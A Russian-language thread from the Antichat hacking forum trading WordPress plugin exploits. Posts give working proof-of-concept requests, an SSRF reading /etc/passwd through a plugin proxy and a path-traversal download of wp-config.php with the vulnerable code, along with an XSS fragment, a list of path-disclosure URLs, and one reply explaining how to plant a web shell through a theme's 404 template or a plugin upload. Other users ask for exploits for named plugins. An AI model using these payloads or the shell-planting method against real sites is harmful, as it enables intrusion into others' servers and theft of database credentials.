HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 21.06.2015, 22:49
avin
Участник форума
Регистрация: 04.07.2011
Сообщений: 103
С нами: 7820246

Репутация: 2
По умолчанию

Цитата:
Сообщение от blackbox  

я тоже не совсем понял, можно просто регистр в расширении другой поставить и тогда такой файл пройдет?
да, пройдет
 
Ответить с цитированием

  #2  
Старый 10.07.2015, 10:16
Sleep
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
С нами: 9752260

Репутация: 150
По умолчанию

WP 3D Twitter Wall

Код:
# Vendor: https://wordpress.org/plugins/3d-twitter-wall/
#/wp-content/plugins/3d-twitter-wall/proxy.php

$url = ($_POST['url']) ? $_POST['url'] : $_GET['url'];
...
$session = curl_init($url);    // $url = $_GET['url'] OR $_POST['url']
...
$response = curl_exec($session);
echo $response;
curl_close($session);
POC: _http://example.com/plugins/3d-twitte...:///etc/passwd
 
Ответить с цитированием

  #3  
Старый 14.07.2015, 12:48
grimnir
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
С нами: 7396886

Репутация: 231


По умолчанию

WordPress CP Image Store with Slideshow 1.0.5 [Arbitrary file download vulnerability]

Код:
# Exploit Title: WordPress CP Image Store with Slideshow 1.0.5  [Arbitrary file download vulnerability]
# Date: 2015-07-10
# Google Dork:
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://wordpress.dwbooster.com/
# Software Link: https://downloads.wordpress.org/plugin/cp-image-store.1.0.5.zip
# Version: 1.0.5
# Tested on: windows 7 + firefox.

====================
DESCRIPTION
====================

A vulnerability has been detected in the WordPress CP Image Store with Slideshow plugin in version 1.0.5 .
The vulnerability allows remote attackers to download arbitrary files from the server.
The Arbitrary file download vulnerability is located in the `cp-image-store.php` file.

The web vulnerability can be exploited by remote attackers without privileged application user account
and without required user interaction. Successful exploitation of the Arbitrary file download vulnerability results
in application compromise.

==============
POC
==============

   # http://wp-host/wp-path/?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLAB@intermal.com&f=../../../../wp-config.php HTTP/1.1
  
   the purchase_id parameter can be bruteforced and succesfully exploit this vulnerability.

  
==================
VULNERABLE CODE
==================

Located in cp-image-store.php

function cpis_download_file(){
    ...
       
    if( isset( $_REQUEST[ 'f' ] ) && cpis_check_download_permissions() ){
        header( 'Content-Type: '.cpis_mime_content_type( basename( $_REQUEST[ 'f' ] ) ) );
        header( 'Content-Disposition: attachment; filename="'.$_REQUEST[ 'f' ].'"' );
        if( cpis_checkMemory( array( CPIS_DOWNLOAD.'/'.$_REQUEST[ 'f' ] ) ) ){
            readfile( CPIS_DOWNLOAD.'/'.$_REQUEST[ 'f' ] );
        }else{
            @unlink( CPIS_DOWNLOAD.'/.htaccess');
            header( 'location:'.CPIS_PLUGIN_URL.'/downloads/'.$_REQUEST[ 'f' ] );
        }
    ...
}
 
Ответить с цитированием

  #4  
Старый 03.08.2015, 12:17
PoizOn
Новичок
Регистрация: 06.06.2006
Сообщений: 2
С нами: 10488992

Репутация: 3
По умолчанию

Вот интересная бага:

http://seclists.org/fulldisclosure/2015/Feb/75

Но я до чего-то вразумительтного ее не докрутил

admin.php?page=wc-reports&";>

admin.php?page=wc-reports&";>WOW
 
Ответить с цитированием

  #5  
Старый 07.12.2015, 06:30
grimnir
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
С нами: 7396886

Репутация: 231


По умолчанию

 
Ответить с цитированием

  #6  
Старый 04.02.2016, 17:44
Sleep
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
С нами: 9752260

Репутация: 150
По умолчанию

Contact form 7


Full Path Disclosure

wp-content/plugins/contact-form-7/includes/upgrade.php

/wp-content/plugins/contact-form-7/modules/acceptance.php

/wp-content/plugins/contact-form-7/modules/akismet.php

/wp-content/plugins/contact-form-7/modules/checkbox.php

/wp-content/plugins/contact-form-7/modules/count.php

/wp-content/plugins/contact-form-7/modules/date.php

/wp-content/plugins/contact-form-7/modules/file.php

/wp-content/plugins/contact-form-7/modules/flamingo.php

/wp-content/plugins/contact-form-7/modules/jetpack.php

/wp-content/plugins/contact-form-7/modules/listo.php

/wp-content/plugins/contact-form-7/modules/number.php

/wp-content/plugins/contact-form-7/modules/quiz.php

/wp-content/plugins/contact-form-7/modules/really-simple-captcha.php

/wp-content/plugins/contact-form-7/modules/recaptcha.php

/wp-content/plugins/contact-form-7/modules/response.php

/wp-content/plugins/contact-form-7/modules/select.php

/wp-content/plugins/contact-form-7/modules/submit.php

/wp-content/plugins/contact-form-7/modules/text.php

/wp-content/plugins/contact-form-7/modules/textarea.php
 
Ответить с цитированием

  #7  
Старый 08.03.2016, 13:31
grimnir
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
С нами: 7396886

Репутация: 231


По умолчанию

https://github.com/rastating/wordpre...loit-framework

Ruby фреймворк для эскплутации и тестирования WP

статья на английском

http://www.kitploit.com/2016/03/word...work-ruby.html
 
Ответить с цитированием

  #8  
Старый 20.04.2016, 14:17
R3hab
Участник форума
Регистрация: 17.05.2015
Сообщений: 117
С нами: 5785526

Репутация: 6
По умолчанию

какие методы есть заливки шелла в wp?
 
Ответить с цитированием

  #9  
Старый 20.04.2016, 15:52
powerOfthemind
Познающий
Регистрация: 31.07.2015
Сообщений: 41
С нами: 5677526

Репутация: 1
По умолчанию

Цитата:
Сообщение от R3hab  

какие методы есть заливки шелла в wp?
Смотря какие у тебя права в админк, если можешь редактировать шаблон то в страницу 404 пихаешь код шела и радуешься или через загрузку плагина, пакуешь в архив шел и льеш на сайт.
 
Ответить с цитированием

  #10  
Старый 03.05.2016, 14:38
.Light.
Участник форума
Регистрация: 12.07.2010
Сообщений: 190
С нами: 8334326

Репутация: 0
По умолчанию

WordPress Plugin Quick Page/Post Redirect Open Redirect Current plugin version: 5.1.3.

WordPress Plugin WooCommerce-excelling eCommerce Cross-Site Scripting Current plugin version: 2.3.13.

Есть чтонить под эти плагины?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов it's my Веб-уязвимости 361 24.10.2019 10:25
[ Обзор уязвимостей PHP-Nuke ] [53x]Shadow Веб-уязвимости 43 04.02.2012 20:33
[ Обзор уязвимостей SLAED CMS ] _kREveDKo_ Веб-уязвимости 20 01.11.2009 14:28
ОБЗОР УЯЗВИМОСТЕЙ БЕСПЛАТНЫХ ПОЧТОВЫХ СЕРВИСОВ nike57 Уязвимости Mail-сервис 4 05.05.2006 22:03
Статья обзор уязвимостей бесплатных почтовых сервисов markel Уязвимости Mail-сервис 3 12.09.2005 10:07



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.